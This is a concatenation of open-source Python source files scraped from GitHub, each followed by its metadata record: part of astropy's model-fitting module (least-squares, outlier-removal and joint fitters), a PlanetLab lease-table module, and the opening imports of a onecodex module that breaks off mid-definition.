# over to get the correctly-orientated lhs for each model:
if lhs.ndim > 2:
lhs_stack = np.rollaxis(lhs, -1, 0)
else:
lhs_stack = np.broadcast_to(lhs, rhs.shape[-1:] + lhs.shape)
# Loop over the models and solve for each one. By this point, the
# model set axis is the second of two. Transpose rather than using,
# say, np.moveaxis(array, -1, 0), since it's slightly faster and
# lstsq can't handle >2D arrays anyway. This could perhaps be
# optimized by collecting together models with identical masks
# (eg. those with no rejected points) into one operation, though it
# will still be relatively slow when calling lstsq repeatedly.
for model_lhs, model_rhs, model_lacoef in zip(lhs_stack, rhs.T, lacoef.T):
# Cull masked points on both sides of the matrix equation:
good = ~model_rhs.mask if masked else slice(None)
model_lhs = model_lhs[good]
model_rhs = model_rhs[good][..., np.newaxis]
a = model_lhs
# Solve for this model:
t_coef, resids, rank, sval = np.linalg.lstsq(model_lhs,
model_rhs, rcond)
model_lacoef[:] = t_coef.T
else:
# If we're fitting one or more models over a common set of points,
# we only have to solve a single matrix equation, which is an order
# of magnitude faster than calling lstsq() once per model below:
good = ~rhs.mask if masked else slice(None) # latter is a no-op
a = lhs[good]
# Solve for one or more models:
lacoef, resids, rank, sval = np.linalg.lstsq(lhs[good],
rhs[good], rcond)
self.fit_info['residuals'] = resids
self.fit_info['rank'] = rank
self.fit_info['singular_values'] = sval
lacoef /= scl[:, np.newaxis] if scl.ndim < rhs.ndim else scl
self.fit_info['params'] = lacoef
_fitter_to_model_params(model_copy, lacoef.flatten())
# TODO: Only Polynomial models currently have an _order attribute;
# maybe change this to read isinstance(model, PolynomialBase)
if hasattr(model_copy, '_order') and len(model_copy) == 1 \
and not has_fixed and rank != model_copy._order:
warnings.warn("The fit may be poorly conditioned\n",
AstropyUserWarning)
# calculate and set covariance matrix and standard devs. on model
if self._calc_uncertainties:
if len(y) > len(lacoef):
self._add_fitting_uncertainties(model_copy, a*scl,
len(lacoef), x, y, z, resids)
model_copy.sync_constraints = True
return model_copy
class FittingWithOutlierRemoval:
"""
This class combines an outlier removal technique with a fitting procedure.
Basically, given a maximum number of iterations ``niter``, outliers are
removed and fitting is performed for each iteration, until no new outliers
are found or ``niter`` is reached.
Parameters
----------
fitter : `Fitter`
An instance of any Astropy fitter, i.e., LinearLSQFitter,
LevMarLSQFitter, SLSQPLSQFitter, SimplexLSQFitter, JointFitter. For
model set fitting, this must understand masked input data (as
indicated by the fitter class attribute ``supports_masked_input``).
outlier_func : callable
A function for outlier removal.
If this accepts an ``axis`` parameter like the `numpy` functions, the
appropriate value will be supplied automatically when fitting model
sets (unless overridden in ``outlier_kwargs``), to find outliers for
each model separately; otherwise, the same filtering must be performed
in a loop over models, which is almost an order of magnitude slower.
niter : int, optional
Maximum number of iterations.
outlier_kwargs : dict, optional
Keyword arguments for outlier_func.
Attributes
----------
fit_info : dict
The ``fit_info`` (if any) from the last iteration of the wrapped
``fitter`` during the most recent fit. An entry is also added with the
keyword ``niter`` that records the actual number of fitting iterations
performed (as opposed to the user-specified maximum).
"""
def __init__(self, fitter, outlier_func, niter=3, **outlier_kwargs):
self.fitter = fitter
self.outlier_func = outlier_func
self.niter = niter
self.outlier_kwargs = outlier_kwargs
self.fit_info = {'niter': None}
def __str__(self):
return ("Fitter: {0}\nOutlier function: {1}\nNum. of iterations: {2}" +
("\nOutlier func. args.: {3}"))\
.format(self.fitter.__class__.__name__,
self.outlier_func.__name__, self.niter,
self.outlier_kwargs)
def __repr__(self):
return ("{0}(fitter: {1}, outlier_func: {2}," +
" niter: {3}, outlier_kwargs: {4})")\
.format(self.__class__.__name__,
self.fitter.__class__.__name__,
self.outlier_func.__name__, self.niter,
self.outlier_kwargs)
def __call__(self, model, x, y, z=None, weights=None, **kwargs):
"""
Parameters
----------
model : `~astropy.modeling.FittableModel`
An analytic model which will be fit to the provided data.
This also contains the initial guess for an optimization
algorithm.
x : array-like
Input coordinates.
y : array-like
Data measurements (1D case) or input coordinates (2D case).
z : array-like, optional
Data measurements (2D case).
weights : array-like, optional
Weights to be passed to the fitter.
kwargs : dict, optional
Keyword arguments to be passed to the fitter.
Returns
-------
fitted_model : `~astropy.modeling.FittableModel`
Fitted model after outlier removal.
mask : `numpy.ndarray`
Boolean mask array, identifying which points were used in the final
fitting iteration (False) and which were found to be outliers or
were masked in the input (True).
"""
# For single models, the data get filtered here at each iteration and
# then passed to the fitter, which is the historical behavior and
# works even for fitters that don't understand masked arrays. For model
# sets, the fitter must be able to filter masked data internally,
# because fitters require a single set of x/y co-ordinates whereas the
# eliminated points can vary between models. To avoid this limitation,
# we could fall back to looping over individual model fits, but it
# would likely be fiddly and involve even more overhead (and the
# non-linear fitters don't work with model sets anyway, as of writing).
if len(model) == 1:
model_set_axis = None
else:
if not hasattr(self.fitter, 'supports_masked_input') or \
self.fitter.supports_masked_input is not True:
raise ValueError("{} cannot fit model sets with masked "
"values".format(type(self.fitter).__name__))
# Fitters use their input model's model_set_axis to determine how
# their input data are stacked:
model_set_axis = model.model_set_axis
# Construct input co-ordinate tuples for fitters & models that are
# appropriate for the dimensionality being fitted:
if z is None:
coords = (x, )
data = y
else:
coords = x, y
data = z
# For model sets, construct a numpy-standard "axis" tuple for the
# outlier function, to treat each model separately (if supported):
if model_set_axis is not None:
if model_set_axis < 0:
model_set_axis += data.ndim
if 'axis' not in self.outlier_kwargs: # allow user override
# This also works for False (like model instantiation):
self.outlier_kwargs['axis'] = tuple(
n for n in range(data.ndim) if n != model_set_axis
)
loop = False
# Starting fit, prior to any iteration and masking:
fitted_model = self.fitter(model, x, y, z, weights=weights, **kwargs)
filtered_data = np.ma.masked_array(data)
if filtered_data.mask is np.ma.nomask:
filtered_data.mask = False
filtered_weights = weights
last_n_masked = filtered_data.mask.sum()
n = 0 # (allow recording no. of iterations when 0)
# Perform the iterative fitting:
for n in range(1, self.niter + 1):
# (Re-)evaluate the last model:
model_vals = fitted_model(*coords, model_set_axis=False)
# Determine the outliers:
if not loop:
# Pass axis parameter if outlier_func accepts it, otherwise
# prepare for looping over models:
try:
filtered_data = self.outlier_func(
filtered_data - model_vals, **self.outlier_kwargs
)
# If this happens to catch an error with a parameter other
# than axis, the next attempt will fail accordingly:
except TypeError:
if model_set_axis is None:
raise
else:
self.outlier_kwargs.pop('axis', None)
loop = True
# Construct MaskedArray to hold filtered values:
filtered_data = np.ma.masked_array(
filtered_data,
dtype=np.result_type(filtered_data, model_vals),
copy=True
)
# Make sure the mask is an array, not just nomask:
if filtered_data.mask is np.ma.nomask:
filtered_data.mask = False
# Get views transposed appropriately for iteration
# over the set (handling data & mask separately due to
# NumPy issue #8506):
data_T = np.rollaxis(filtered_data, model_set_axis, 0)
mask_T = np.rollaxis(filtered_data.mask,
model_set_axis, 0)
if loop:
model_vals_T = np.rollaxis(model_vals, model_set_axis, 0)
for row_data, row_mask, row_mod_vals in zip(data_T, mask_T,
model_vals_T):
masked_residuals = self.outlier_func(
row_data - row_mod_vals, **self.outlier_kwargs
)
row_data.data[:] = masked_residuals.data
row_mask[:] = masked_residuals.mask
# Issue speed warning after the fact, so it only shows up when
# the TypeError is genuinely due to the axis argument.
warnings.warn('outlier_func did not accept axis argument; '
'reverted to slow loop over models.',
AstropyUserWarning)
# Recombine newly-masked residuals with model to get masked values:
filtered_data += model_vals
# Re-fit the data after filtering, passing masked/unmasked values
# for single models / sets, respectively:
if model_set_axis is None:
good = ~filtered_data.mask
if weights is not None:
filtered_weights = weights[good]
fitted_model = self.fitter(fitted_model,
*(c[good] for c in coords),
filtered_data.data[good],
weights=filtered_weights, **kwargs)
else:
fitted_model = self.fitter(fitted_model, *coords,
filtered_data,
weights=filtered_weights, **kwargs)
# Stop iteration if the masked points are no longer changing (with
# cumulative rejection we only need to compare how many there are):
this_n_masked = filtered_data.mask.sum() # (minimal overhead)
if this_n_masked == last_n_masked:
break
last_n_masked = this_n_masked
self.fit_info = {'niter': n}
self.fit_info.update(getattr(self.fitter, 'fit_info', {}))
return fitted_model, filtered_data.mask
class LevMarLSQFitter(metaclass=_FitterMeta):
"""
Levenberg-Marquardt algorithm and least squares statistic.
Attributes
----------
fit_info : dict
The `scipy.optimize.leastsq` result for the most recent fit (see
notes).
Notes
-----
The ``fit_info`` dictionary contains the values returned by
`scipy.optimize.leastsq` for the most recent fit, including the values from
the ``infodict`` dictionary it returns. See the `scipy.optimize.leastsq`
documentation for details on the meaning of these values. Note that the
``x`` return value is *not* included (as it is instead the parameter values
of the returned model).
Additionally, one additional element of ``fit_info`` is computed whenever a
model is fit, with the key 'param_cov'. The corresponding value is the
covariance matrix of the parameters as a 2D numpy array. The order of the
matrix elements matches the order of the parameters in the fitted model
(i.e., the same order as ``model.param_names``).
"""
supported_constraints = ['fixed', 'tied', 'bounds']
"""
The constraint types supported by this fitter type.
"""
def __init__(self, calc_uncertainties=False):
self.fit_info = {'nfev': None,
'fvec': None,
'fjac': None,
'ipvt': None,
'qtf': None,
'message': None,
'ierr': None,
'param_jac': None,
'param_cov': None}
self._calc_uncertainties=calc_uncertainties
super().__init__()
def objective_function(self, fps, *args):
"""
Function to minimize.
Parameters
----------
fps : list
parameters returned by the fitter
args : list
[model, [weights], [input coordinates]]
"""
model = args[0]
weights = args[1]
_fitter_to_model_params(model, fps)
meas = args[-1]
if weights is None:
return np.ravel(model(*args[2: -1]) - meas)
else:
return np.ravel(weights * (model(*args[2: -1]) - meas))
@staticmethod
def _add_fitting_uncertainties(model, cov_matrix):
"""
Set ``cov_matrix`` and ``stds`` attributes on model with parameter
covariance matrix returned by ``optimize.leastsq``.
"""
free_param_names = [x for x in model.fixed if (model.fixed[x] is False)
and (model.tied[x] is False)]
model.cov_matrix = Covariance(cov_matrix, free_param_names)
model.stds = StandardDeviations(cov_matrix, free_param_names)
@fitter_unit_support
def __call__(self, model, x, y, z=None, weights=None,
maxiter=DEFAULT_MAXITER, acc=DEFAULT_ACC,
epsilon=DEFAULT_EPS, estimate_jacobian=False):
"""
Fit data to this model.
Parameters
----------
model : `~astropy.modeling.FittableModel`
model to fit to x, y, z
x : array
input coordinates
y : array
input coordinates
z : array, optional
input coordinates
weights : array, optional
Weights for fitting.
For data with Gaussian uncertainties, the weights should be
1/sigma.
maxiter : int
maximum number of iterations
acc : float
Relative error desired in the approximate solution
epsilon : float
A suitable step length for the forward-difference
approximation of the Jacobian (if model.fjac=None). If
epsfcn is less than the machine precision, it is
assumed that the relative errors in the functions are
of the order of the machine precision.
estimate_jacobian : bool
If False (default) and if the model has a fit_deriv method,
it will be used. Otherwise the Jacobian will be estimated.
If True, the Jacobian will be estimated in any case.
equivalencies : list or None, optional, keyword-only
List of *additional* equivalencies that are should be applied in
case x, y and/or z have units. Default is None.
Returns
-------
model_copy : `~astropy.modeling.FittableModel`
a copy of the input model with parameters set by the fitter
"""
from scipy import optimize
model_copy = _validate_model(model, self.supported_constraints)
model_copy.sync_constraints = False
farg = (model_copy, weights, ) + _convert_input(x, y, z)
if model_copy.fit_deriv is None or estimate_jacobian:
dfunc = None
else:
dfunc = self._wrap_deriv
init_values, _ = _model_to_fit_params(model_copy)
fitparams, cov_x, dinfo, mess, ierr = optimize.leastsq(
self.objective_function, init_values, args=farg, Dfun=dfunc,
col_deriv=model_copy.col_fit_deriv, maxfev=maxiter, epsfcn=epsilon,
xtol=acc, full_output=True)
_fitter_to_model_params(model_copy, fitparams)
self.fit_info.update(dinfo)
self.fit_info['cov_x'] = cov_x
self.fit_info['message'] = mess
self.fit_info['ierr'] = ierr
if ierr not in [1, 2, 3, 4]:
warnings.warn("The fit may be unsuccessful; check "
"fit_info['message'] for more information.",
AstropyUserWarning)
# now try to compute the true covariance matrix
if (len(y) > len(init_values)) and cov_x is not None:
sum_sqrs = np.sum(self.objective_function(fitparams, *farg)**2)
dof = len(y) - len(init_values)
self.fit_info['param_cov'] = cov_x * sum_sqrs / dof
else:
self.fit_info['param_cov'] = None
if self._calc_uncertainties is True:
if self.fit_info['param_cov'] is not None:
self._add_fitting_uncertainties(model_copy,
self.fit_info['param_cov'])
model_copy.sync_constraints = True
return model_copy
@staticmethod
def _wrap_deriv(params, model, weights, x, y, z=None):
"""
Wraps the method calculating the Jacobian of the function to account
for model constraints.
`scipy.optimize.leastsq` expects the function derivative to have the
above signature (parlist, (argtuple)). In order to accommodate model
constraints, instead of using p directly, we set the parameter list in
this function.
"""
if weights is None:
weights = 1.0
if any(model.fixed.values()) or any(model.tied.values()):
# update the parameters with the current values from the fitter
_fitter_to_model_params(model, params)
if z is None:
full = np.array(model.fit_deriv(x, *model.parameters))
if not model.col_fit_deriv:
full_deriv = np.ravel(weights) * full.T
else:
full_deriv = np.ravel(weights) * full
else:
full = np.array([np.ravel(_) for _ in model.fit_deriv(x, y, *model.parameters)])
if not model.col_fit_deriv:
full_deriv = np.ravel(weights) * full.T
else:
full_deriv = np.ravel(weights) * full
pars = [getattr(model, name) for name in model.param_names]
fixed = [par.fixed for par in pars]
tied = [par.tied for par in pars]
tied = list(np.where([par.tied is not False for par in pars],
True, tied))
fix_and_tie = np.logical_or(fixed, tied)
ind = np.logical_not(fix_and_tie)
if not model.col_fit_deriv:
residues = np.asarray(full_deriv[np.nonzero(ind)]).T
else:
residues = full_deriv[np.nonzero(ind)]
return [np.ravel(_) for _ in residues]
else:
if z is None:
try:
return np.array([np.ravel(_) for _ in np.array(weights) *
np.array(model.fit_deriv(x, *params))])
except ValueError:
return np.array([np.ravel(_) for _ in np.array(weights) *
np.moveaxis(
np.array(model.fit_deriv(x, *params)),
-1, 0)]).transpose()
else:
if not model.col_fit_deriv:
return [np.ravel(_) for _ in
(np.ravel(weights) * np.array(model.fit_deriv(x, y, *params)).T).T]
return [np.ravel(_) for _ in weights * np.array(model.fit_deriv(x, y, *params))]
class SLSQPLSQFitter(Fitter):
"""
Sequential Least Squares Programming (SLSQP) optimization algorithm and
least squares statistic.
Raises
------
ModelLinearityError
A linear model is passed to a nonlinear fitter
Notes
------
See also the `~astropy.modeling.optimizers.SLSQP` optimizer.
"""
supported_constraints = SLSQP.supported_constraints
def __init__(self):
super().__init__(optimizer=SLSQP, statistic=leastsquare)
self.fit_info = {}
@fitter_unit_support
def __call__(self, model, x, y, z=None, weights=None, **kwargs):
"""
Fit data to this model.
Parameters
----------
model : `~astropy.modeling.FittableModel`
model to fit to x, y, z
x : array
input coordinates
y : array
input coordinates
z : array, optional
input coordinates
weights : array, optional
Weights for fitting.
For data with Gaussian uncertainties, the weights should be
1/sigma.
kwargs : dict
optional keyword arguments to be passed to the optimizer or the statistic
verblevel : int
0-silent
1-print summary upon completion,
2-print summary after each iteration
maxiter : int
maximum number of iterations
epsilon : float
the step size for finite-difference derivative estimates
acc : float
Requested accuracy
equivalencies : list or None, optional, keyword-only
List of *additional* equivalencies that are should be applied in
case x, y and/or z have units. Default is None.
Returns
-------
model_copy : `~astropy.modeling.FittableModel`
a copy of the input model with parameters set by the fitter
"""
model_copy = _validate_model(model, self._opt_method.supported_constraints)
model_copy.sync_constraints = False
farg = _convert_input(x, y, z)
farg = (model_copy, weights, ) + farg
init_values, _ = _model_to_fit_params(model_copy)
fitparams, self.fit_info = self._opt_method(
self.objective_function, init_values, farg, **kwargs)
_fitter_to_model_params(model_copy, fitparams)
model_copy.sync_constraints = True
return model_copy
class SimplexLSQFitter(Fitter):
"""
Simplex algorithm and least squares statistic.
Raises
------
`ModelLinearityError`
A linear model is passed to a nonlinear fitter
"""
supported_constraints = Simplex.supported_constraints
def __init__(self):
super().__init__(optimizer=Simplex, statistic=leastsquare)
self.fit_info = {}
@fitter_unit_support
def __call__(self, model, x, y, z=None, weights=None, **kwargs):
"""
Fit data to this model.
Parameters
----------
model : `~astropy.modeling.FittableModel`
model to fit to x, y, z
x : array
input coordinates
y : array
input coordinates
z : array, optional
input coordinates
weights : array, optional
Weights for fitting.
For data with Gaussian uncertainties, the weights should be
1/sigma.
kwargs : dict
optional keyword arguments to be passed to the optimizer or the statistic
maxiter : int
maximum number of iterations
acc : float
Relative error in approximate solution
equivalencies : list or None, optional, keyword-only
List of *additional* equivalencies that are should be applied in
case x, y and/or z have units. Default is None.
Returns
-------
model_copy : `~astropy.modeling.FittableModel`
a copy of the input model with parameters set by the fitter
"""
model_copy = _validate_model(model,
self._opt_method.supported_constraints)
model_copy.sync_constraints = False
farg = _convert_input(x, y, z)
farg = (model_copy, weights, ) + farg
init_values, _ = _model_to_fit_params(model_copy)
fitparams, self.fit_info = self._opt_method(
self.objective_function, init_values, farg, **kwargs)
_fitter_to_model_params(model_copy, fitparams)
model_copy.sync_constraints = True
return model_copy
class JointFitter(metaclass=_FitterMeta):
"""
Fit models which share a parameter.
For example, fit two gaussians to two data sets but keep
the FWHM the same.
Parameters
----------
models : list
a list of model instances
jointparameters : list
a list of joint parameters
initvals : list
a list of initial values
"""
def __init__(self, models, jointparameters, initvals):
self.models = list(models)
self.initvals = list(initvals)
self.jointparams = jointparameters
self._verify_input()
self.fitparams = self._model_to_fit_params()
# a list of model.n_inputs
self.modeldims = [m.n_inputs for m in self.models]
# sum all model dimensions
self.ndim = np.sum(self.modeldims)
def _model_to_fit_params(self):
fparams = []
fparams.extend(self.initvals)
for model in self.models:
params = model.parameters.tolist()
joint_params = self.jointparams[model]
param_metrics = model._param_metrics
for param_name in joint_params:
slice_ = param_metrics[param_name]['slice']
del params[slice_]
fparams.extend(params)
return fparams
def objective_function(self, fps, *args):
"""
Function to minimize.
Parameters
----------
fps : list
the fitted parameters - result of an one iteration of the
fitting algorithm
args : dict
tuple of measured and input coordinates
args is always passed as a tuple from optimize.leastsq
"""
lstsqargs = list(args)
fitted = []
fitparams = list(fps)
numjp = len(self.initvals)
# make a separate list of the joint fitted parameters
jointfitparams = fitparams[:numjp]
del fitparams[:numjp]
for model in self.models:
joint_params = self.jointparams[model]
margs = lstsqargs[:model.n_inputs + 1]
del lstsqargs[:model.n_inputs + 1]
# separate each model separately fitted parameters
numfp = len(model._parameters) - len(joint_params)
mfparams = fitparams[:numfp]
del fitparams[:numfp]
# recreate the model parameters
mparams = []
param_metrics = model._param_metrics
for param_name in model.param_names:
if param_name in joint_params:
index = joint_params.index(param_name)
# should do this with slices in case the
# parameter is not a number
mparams.extend([jointfitparams[index]])
else:
slice_ = param_metrics[param_name]['slice']
plen = slice_.stop - slice_.start
mparams.extend(mfparams[:plen])
del mfparams[:plen]
modelfit = model.evaluate(margs[:-1], *mparams)
fitted.extend(modelfit - margs[-1])
return np.ravel(fitted)
def _verify_input(self):
if len(self.models) <= 1:
raise TypeError(f"Expected >1 models, {len(self.models)} is given")
if len(self.jointparams.keys()) < 2:
raise TypeError("At least two parameters are expected, "
"{} is given".format(len(self.jointparams.keys())))
for j in self.jointparams.keys():
if len(self.jointparams[j]) != len(self.initvals):
raise TypeError("{} parameter(s) provided but {} expected".format(
len(self.jointparams[j]), len(self.initvals)))
def __call__(self, *args):
"""
Fit data to these models keeping some of the parameters common to the
two models.
"""
from scipy import optimize
if len(args) != reduce(lambda x, y: x + 1 + y + 1, self.modeldims):
raise ValueError("Expected {} coordinates in args but {} provided"
.format(reduce(lambda x, y: x + 1 + y + 1,
self.modeldims), len(args)))
self.fitparams[:], _ = optimize.leastsq(self.objective_function,
self.fitparams, args=args)
fparams = self.fitparams[:]
numjp = len(self.initvals)
# make a separate list of the joint fitted parameters
jointfitparams = fparams[:numjp]
del fparams[:numjp]
for model in self.models:
# extract each model's fitted parameters
joint_params = self.jointparams[model]
numfp = len(model._parameters) - len(joint_params)
mfparams = fparams[:numfp]
del fparams[:numfp]
# recreate the model parameters
mparams = []
param_metrics = model._param_metrics
for param_name in model.param_names:
if param_name in joint_params:
index = joint_params.index(param_name)
# should do this with slices in case the parameter
# is not a number
mparams.extend([jointfitparams[index]])
else:
slice_ = param_metrics[param_name]['slice']
plen = slice_.stop - slice_.start
mparams.extend(mfparams[:plen])
del mfparams[:plen]
model.parameters = np.array(mparams)
def _convert_input(x, y, z=None, n_models=1, model_set_axis=0):
"""Convert inputs to float arrays."""
x = np.asanyarray(x, dtype=float)
y = np.asanyarray(y, dtype=float)
if z is not None:
z = np.asanyarray(z, dtype=float)
data_ndim, data_shape = z.ndim, z.shape
else:
data_ndim, data_shape = y.ndim, y.shape
# For compatibility with how the linear fitter code currently expects to
# work, shift the dependent variable's axes to the expected locations
if n_models > 1 or data_ndim > x.ndim:
if (model_set_axis or 0) >= data_ndim:
raise ValueError("model_set_axis out of range")
if data_shape[model_set_axis] != n_models:
raise ValueError(
"Number of data sets (y or z array) is expected to equal "
"the number of parameter sets"
)
if z is None:
# For a 1-D model the y coordinate's model-set-axis is expected to
# be last, so that its first dimension is the same length as the x
# coordinates. This is in line with the expectations of
# numpy.linalg.lstsq:
# https://numpy.org/doc/stable/reference/generated/numpy.linalg.lstsq.html
# That is, each model should be represented by a column. TODO:
# Obviously this is a detail of np.linalg.lstsq and should be
# handled specifically by any fitters that use it...
y = np.rollaxis(y, model_set_axis, y.ndim)
data_shape = y.shape[:-1]
else:
# Shape of z excluding model_set_axis
data_shape = (z.shape[:model_set_axis] +
z.shape[model_set_axis + 1:])
if z is None:
if data_shape != x.shape:
raise ValueError("x and y should have the same shape")
farg = (x, y)
else:
if not (x.shape == y.shape == data_shape):
raise ValueError("x, y and z should have the same shape")
farg = (x, y, z)
return farg
# TODO: These utility functions are really particular to handling
# bounds/tied/fixed constraints for scipy.optimize optimizers that do not
# support them inherently; this needs to be reworked to be clear about this
# distinction (and the fact that these are not necessarily applicable to any
# arbitrary fitter--as evidenced for example by the fact that JointFitter has
# its own versions of these)
# TODO: Most of this code should be entirely rewritten; it should not be as
# inefficient as it is.
def _fitter_to_model_params(model, fps):
"""
Constructs the full list of model parameters from the fitted and
constrained parameters.
"""
_, fit_param_indices = _model_to_fit_params(model)
has_tied = any(model.tied.values())
has_fixed = any(model.fixed.values())
has_bound = any(b != (None, None) for b in model.bounds.values())
parameters = model.parameters
if not (has_tied or has_fixed or has_bound):
# We can just assign directly
model.parameters = fps
return
fit_param_indices = set(fit_param_indices)
offset = 0
param_metrics = model._param_metrics
for idx, name in enumerate(model.param_names):
if idx not in fit_param_indices:
continue
slice_ = param_metrics[name]['slice']
shape = param_metrics[name]['shape']
# This is determining which range of fps (the fitted parameters) maps
# to parameters of the model
size = reduce(operator.mul, shape, 1)
values = fps[offset:offset + size]
# Check bounds constraints
if model.bounds[name] != (None, None):
_min, _max = model.bounds[name]
if _min is not None:
values = np.fmax(values, _min)
if _max is not None:
values = np.fmin(values, _max)
parameters[slice_] = values
offset += size
# Update model parameters before calling ``tied`` constraints.
model._array_to_parameters()
# This has to be done in a separate loop due to how tied parameters are
# currently evaluated (the fitted parameters need to actually be *set* on
# the model first, for use in evaluating the "tied" expression--it might be
# better to change this at some point
if has_tied:
for idx, name in enumerate(model.param_names):
if model.tied[name]:
value = model.tied[name](model)
slice_ = param_metrics[name]['slice']
# To handle multiple tied constraints, model parameters
# need to be updated after each iteration.
parameters[slice_] = value
model._array_to_parameters()
def _model_to_fit_params(model):
"""
Convert a model instance's parameter array to an array that can be used
with a fitter that doesn't natively support fixed or tied parameters.
In particular, it removes fixed/tied parameters from the parameter
array.
These may be a subset of the model parameters, if some of them are held
constant or tied.
"""
fitparam_indices = list(range(len(model.param_names)))
if any(model.fixed.values()) or any(model.tied.values()):
params = list(model.parameters)
param_metrics = model._param_metrics
for idx, name in list(enumerate(model.param_names))[::-1]:
if model.fixed[name] or model.tied[name]:
slice_ = param_metrics[name]['slice']
del params[slice_]
del fitparam_indices[idx]
return (np.array(params), fitparam_indices)
return (model.parameters, fitparam_indices)
def _validate_constraints(supported_constraints, model):
"""Make sure model constraints are supported by the current fitter."""
message = 'Optimizer cannot handle {0} constraints.'
if (any(model.fixed.values()) and
'fixed' not in supported_constraints):
raise UnsupportedConstraintError(
message.format('fixed parameter'))
if any(model.tied.values()) and 'tied' not in supported_constraints:
raise UnsupportedConstraintError(
message.format('tied parameter'))
if (any(tuple(b) != (None, None) for b in model.bounds.values()) and
'bounds' not in supported_constraints):
raise UnsupportedConstraintError(
message.format('bound parameter'))
if model.eqcons and 'eqcons' not in supported_constraints:
raise UnsupportedConstraintError(message.format('equality'))
if model.ineqcons and 'ineqcons' not in supported_constraints:
raise UnsupportedConstraintError(message.format('inequality'))
def _validate_model(model, supported_constraints):
"""
Check that model and fitter are compatible and return a copy of the model.
"""
if not model.fittable:
raise ValueError("Model does not appear to be fittable.")
if model.linear:
warnings.warn('Model is linear in parameters; '
'consider using linear fitting methods.',
AstropyUserWarning)
elif len(model) != 1:
# for now only single data sets ca be fitted
raise ValueError("Non-linear fitters can only fit "
"one data set at a time.")
_validate_constraints(supported_constraints, model)
model_copy = model.copy()
return model_copy
def populate_entry_points(entry_points):
"""
This injects entry points into the `astropy.modeling.fitting` namespace.
This provides a means of inserting a fitting routine without requirement
of it being merged into astropy's core.
Parameters
----------
entry_points : list of `~importlib.metadata.EntryPoint`
entry_points are objects which encapsulate importable objects and
are defined on the installation of a package.
Notes
-----
An explanation of entry points can be found `here <http://setuptools.readthedocs.io/en/latest/setuptools.html#dynamic-discovery-of-services-and-plugins>`
"""
for entry_point in entry_points:
name = entry_point.name
try:
entry_point = entry_point.load()
except Exception as e:
# This stops the fitting from choking if an entry_point produces an error.
warnings.warn(AstropyUserWarning(
f'{type(e).__name__} error occurred in entry point {name}.'))
else:
if not inspect.isclass(entry_point):
warnings.warn(AstropyUserWarning(
f'Modeling entry point {name} expected to be a Class.'))
else:
if issubclass(entry_point, Fitter):
name = entry_point.__name__
globals()[name] = entry_point
__all__.append(name)
else:
warnings.warn(AstropyUserWarning(
'Modeling entry point {} expected to extend '
'astropy.modeling.Fitter' .format(name)))
def _populate_ep():
# TODO: Exclusively use select when Python minversion is 3.10
ep = entry_points()
if hasattr(ep, 'select'):
populate_entry_points(ep.select(group='astropy.modeling'))
else:
populate_entry_points(ep.get('astropy.modeling', []))
_populate_ep()
| {
"content_hash": "8ee6f9c892143cef47acbc0315c39ce5",
"timestamp": "",
"source": "github",
"line_count": 1778,
"max_line_length": 157,
"avg_line_length": 40.16029246344207,
"alnum_prop": 0.5630558084167775,
"repo_name": "aleksandr-bakanov/astropy",
"id": "72820abe73ed43069b0142c3b5ea5c00dced6f34",
"size": "71470",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "astropy/modeling/fitting.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "444651"
},
{
"name": "C++",
"bytes": "1057"
},
{
"name": "HTML",
"bytes": "1172"
},
{
"name": "Objective-C",
"bytes": "615"
},
{
"name": "Python",
"bytes": "9898093"
},
{
"name": "TeX",
"bytes": "853"
}
],
"symlink_target": ""
} |
from datetime import datetime
from PLC.Faults import *
from PLC.Parameter import Parameter, Mixed
from PLC.Filter import Filter
from PLC.Table import Row, Table
from PLC.Nodes import Node, Nodes
from PLC.Slices import Slice, Slices
from PLC.LeaseFilter import LeaseFilter
from PLC.Timestamp import Timestamp
class Lease(Row):
"""
Representation of a row in the leases table. To use, optionally
instantiate with a dict of values. Update as you would a
dict. Commit to the database with sync().
"""
table_name = 'leases'
primary_key = 'lease_id'
join_tables = [ ]
fields = {
# native
'lease_id': Parameter(int, "Lease identifier"),
't_from': Timestamp.Parameter("timeslot start"),
't_until': Timestamp.Parameter("timeslot end"),
'node_id': Node.fields['node_id'],
'slice_id': Slice.fields['slice_id'],
# derived
'hostname': Node.fields['hostname'],
'node_type': Node.fields['node_type'],
'name': Slice.fields['name'],
'site_id': Slice.fields['site_id'],
'duration': Parameter(int, "duration in seconds"),
'expired' : Parameter(bool, "time slot is over"),
}
related_fields = { }
def validate_time (self, timestamp, round_up):
# convert to long
timestamp = Timestamp.cast_long(timestamp)
# retrieve configured granularity
granularity = self.api.config.PLC_RESERVATION_GRANULARITY
# the trick for rounding up rather than down
if round_up:
timestamp += (granularity-1)
# round down
timestamp = (timestamp // granularity) * granularity
# return a SQL string
return Timestamp.sql_validate_utc(timestamp)
# round UP
def validate_t_from(self, timestamp):
return self.validate_time(timestamp, round_up=True)
# round DOWN
def validate_t_until (self, timestamp):
return self.validate_time(timestamp, round_up=False)
class Leases(Table):
"""
Representation of row(s) from the leases table in the
database.
"""
def __init__(self, api, lease_filter = None, columns = None):
Table.__init__(self, api, Lease, columns)
# the view that we're selecting upon: start with view_leases
view = "view_leases"
sql = "SELECT %s FROM %s WHERE true" % (", ".join(list(self.columns.keys())),view)
if lease_filter is not None:
if isinstance(lease_filter, (list, tuple, set, int)):
lease_filter = Filter(Lease.fields, {'lease_id': lease_filter})
elif isinstance(lease_filter, dict):
lease_filter = LeaseFilter(Lease.fields, lease_filter)
else:
raise PLCInvalidArgument("Wrong lease filter %r"%lease_filter)
sql += " AND (%s) %s" % lease_filter.sql(api)
self.selectall(sql)
| {
"content_hash": "b6a146cc1bd8ac9c03763e2f4137a515",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 90,
"avg_line_length": 34.476190476190474,
"alnum_prop": 0.6205110497237569,
"repo_name": "dreibh/planetlab-lxc-plcapi",
"id": "9da3d3b0f173c9929a46c77245fd62da9079aa3c",
"size": "3000",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PLC/Leases.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Dockerfile",
"bytes": "724"
},
{
"name": "Makefile",
"bytes": "2995"
},
{
"name": "PHP",
"bytes": "574445"
},
{
"name": "PLpgSQL",
"bytes": "2764"
},
{
"name": "Perl",
"bytes": "1350"
},
{
"name": "Python",
"bytes": "871238"
},
{
"name": "Shell",
"bytes": "31392"
}
],
"symlink_target": ""
} |
import click
import inspect
import os
import requests
from onecodex.exceptions import OneCodexException, UnboundObject
def as_uri(uuid, base_class):
